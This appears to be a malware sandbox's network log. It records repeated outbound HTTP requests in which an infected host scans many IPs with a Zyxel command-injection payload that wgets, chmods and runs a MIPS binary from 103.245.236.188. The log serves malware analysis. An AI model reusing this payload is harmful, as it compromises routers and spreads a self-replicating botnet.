                                                Jan 12, 2024 18:16:09.129183054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1054192.168.2.2335882124.254.4.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129209995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1055192.168.2.235998424.6.106.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129266024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1056192.168.2.2334144156.67.237.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129291058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1057192.168.2.236084041.116.156.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129343987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1058192.168.2.233490234.26.206.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129398108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1059192.168.2.2337428164.103.202.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132955074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1060192.168.2.2349894221.229.102.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132998943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1061192.168.2.234156295.20.118.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132996082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1062192.168.2.2345408179.246.19.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132997036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1063192.168.2.2358332197.66.34.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132997990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1064192.168.2.233584868.40.63.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132996082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1065192.168.2.2355586142.227.191.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133011103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1066192.168.2.2335066132.214.89.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.132998943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1067192.168.2.2349436116.249.116.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133023977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1068192.168.2.235000837.254.214.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133027077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1069192.168.2.234612497.229.6.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133023977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1070192.168.2.2336496197.219.7.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133044958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1071192.168.2.2335416164.240.63.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133089066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1072192.168.2.234640824.24.118.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133419037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1073192.168.2.2341490119.25.154.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133419037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1074192.168.2.235853877.221.74.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133420944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1075192.168.2.2338454204.102.79.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133420944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1076192.168.2.234740636.220.248.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133424997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1077192.168.2.2334618100.216.237.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.133450985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1078192.168.2.2334844165.118.242.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141519070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1079192.168.2.233874281.224.50.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141568899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1080192.168.2.2357644113.128.49.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141628027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1081192.168.2.2338380179.219.170.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141680002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1082192.168.2.2337966130.184.185.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141753912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1083192.168.2.233795264.95.26.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141781092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1084192.168.2.2356694102.38.41.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141844988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1085192.168.2.2352716212.67.133.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141866922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1086192.168.2.2333718114.85.7.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141913891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1087192.168.2.233459842.141.100.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141920090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1088192.168.2.233292066.139.183.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.141984940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1089192.168.2.2346226153.168.116.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142007113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1090192.168.2.2352578178.240.235.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142055988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1091192.168.2.234310862.162.3.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142097950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1092192.168.2.233481261.14.184.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142158985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1093192.168.2.2351266178.77.50.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142195940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1094192.168.2.2355544171.129.103.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142229080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1095192.168.2.2337610113.248.97.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142277956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1096192.168.2.234544436.230.138.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142312050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1097192.168.2.234770081.147.123.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142347097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1098192.168.2.2349306149.74.132.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142386913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1099192.168.2.2353100207.108.191.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142446995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1100192.168.2.235605640.149.222.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142466068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1101192.168.2.235324278.155.79.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142510891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1102192.168.2.235928678.18.222.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142561913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1103192.168.2.235317848.42.163.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142600060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1104192.168.2.2357174195.153.76.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142666101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1105192.168.2.235097279.106.63.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142716885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1106192.168.2.234445035.78.72.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142761946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1107192.168.2.2348884191.211.226.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142788887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1108192.168.2.2341518190.71.215.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142853022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1109192.168.2.2343312111.128.228.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142873049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1110192.168.2.234922051.167.140.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142916918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1111192.168.2.2347192216.104.223.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142942905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1112192.168.2.233689691.222.74.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.142997026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1113192.168.2.2358952205.53.221.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143040895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1114192.168.2.2346204122.98.42.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143084049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1115192.168.2.234547686.47.121.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143129110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1116192.168.2.235728212.167.62.32443
                                                TimestampBytes transferredDirectionData
